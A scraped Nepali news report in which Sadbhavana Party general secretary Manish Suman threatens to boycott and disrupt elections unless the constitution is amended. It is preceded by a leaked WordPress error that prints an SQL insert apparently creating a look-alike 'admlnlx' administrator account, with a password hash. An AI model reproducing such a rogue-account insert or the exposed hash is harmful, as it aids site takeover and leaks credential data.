WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoZoDLXZx4TvKIiCQFp7EFQFtR3Mpa1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 03:39:18', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १-
सद्भावना पार्टीका महासचिव मनिष सुमनले औचित्यपूर्णरुपमा संविधान संशोधन नभए आफूहरु चुनावमा भाग नलिने बताएका छन् ।संघीय गठबन्धनले राजधानीमा शनिबार आयोजना गरेको अन्तरक्रिया कार्यक्रममा आफ्नो धारणा राख्दै संविधान संशोधन बिना चुनाव हुन नसक्ने ठोकुवा गरेका हुन् ।
सुमनले भने, ‘संविधान संशोधन भएन भने हामी चुनावमा सहभागी हुँदैनौँ, चुनाव पनि हुन दिँदैनौँ । यदी सरकारले जबर्जस्ती चुनाव गर्न खोज्छ भने हामी मतपत्र च्यात्छौँ, मतपत्र जलाउँछौँ ।सही रुपमा संविधान संशोधन नभए गठबन्धनले आफ्नै संविधान घोषणा गरेर जारी गर्ने चेतावनी समेत दिए ।
सुमनले संविधान कार्यान्वयन गर्नु भनेको तीनवटा चुनाव मात्र गर्नु नरहेको उल्लेख गरे । संविधानको अन्तरवस्तुलाई लागुसमेत गर्नुपर्ने उनको धारणा थियो ।‘न्यायालयमा संविधानमा रहेको समावेशिता र समानुपातिकताको मर्मविपरित न्यायाधीसहरु नियुक्ति गरियो । यो एकलौटी रुपमा गरिएको निर्णय मान्य छैन,’ उनले भने, ‘संविधान लेख्ने आफैले संविधानको धारा ३८, ४० र ४२ का विरुद्ध काम गरेका छन् ।’ संविधान लेख्नेले नै संविधान नमानिरहेको उनको तर्क थियो ।
त्यस्तै, स्थानीय पुनःसंचरना आयोगले सरकारलाई बुझाएको प्रतिवेदन लागु हुननसक्ने उनको भनाई थियो । ‘सरकारले पुनःसंचरना आयोगले तयार गरेको प्रतिवेदन बुझेको छ । यदी त्यो लागु भयो भने प्रधानमन्त्री प्रचण्डविरुद्ध गाउँ–गाउँबाट जनविद्रोह हुनेछ ।’